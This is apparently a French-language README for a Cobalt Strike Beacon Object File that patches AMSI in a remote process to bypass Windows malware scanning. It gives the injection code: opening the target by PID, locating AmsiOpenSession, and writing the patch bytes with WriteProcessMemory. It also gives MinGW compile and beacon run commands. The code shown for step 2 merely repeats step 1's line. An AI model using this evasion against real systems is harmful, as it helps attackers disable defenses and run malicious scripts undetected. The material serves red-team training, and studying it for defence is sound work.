Cobalt Strike BOF - Injecter un contournement AMSI
Beacon Object File (BOF) Cobalt Strike qui contourne AMSI dans un processus distant via une injection de code.
Exécution du BOF inject-amsiBypass depuis CobaltStrike

Qu'est-ce que cela fait ?
1. Utilise l'argument PID fourni pour obtenir un handle sur le processus distant
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Charge AMSI.DLL dans la mémoire du beacon et obtient l'adresse de AMSI.AmsiOpenSession
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
- Le beacon et le processus cible auront tous deux la même adresse pour le symbole.
- Si AMSI.DLL n'existe pas dans le processus distant, l'exécution de ceci peut faire planter le processus cible.
3. Écrit le contournement AMSI dans la mémoire du processus distant
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);
Méthode = AMSI.AmsiOpenSession
- Utilise la technique de contournement AMSI enseignée dans le cours PEN-300/OSEP d'Offensive Security (Techniques d'évasion et défenses de brèche).
Captures d'écran de démonstration du concept
Avant - Powershell.exe AMSI.AmsiOpenSession

Après - Powershell.exe AMSI.AmsiOpenSession

Compilation avec MinGW x64 :
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o
Exécution depuis la console Beacon de Cobalt Strike
beacon> inject-amsiBypass <PID>
- Assurez-vous de charger le script inject-amsiBypass.cna dans le gestionnaire de scripts de Cobalt Strike.
Liste des tâches à accomplir
- Vérifier que AMSI.DLL existe dans le processus distant avant l'injection
- Ajouter d'autres contournements AMSI à injecter
- Support x86
Crédits / Références
Raphael Mudge - Fichiers objets Beacon - Démo Luser
Cobalt Strike - Fichiers objets Beacon
Références de code BOF
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Cours Sektor7 Malware Dev Essentials
Offensive Security OSEP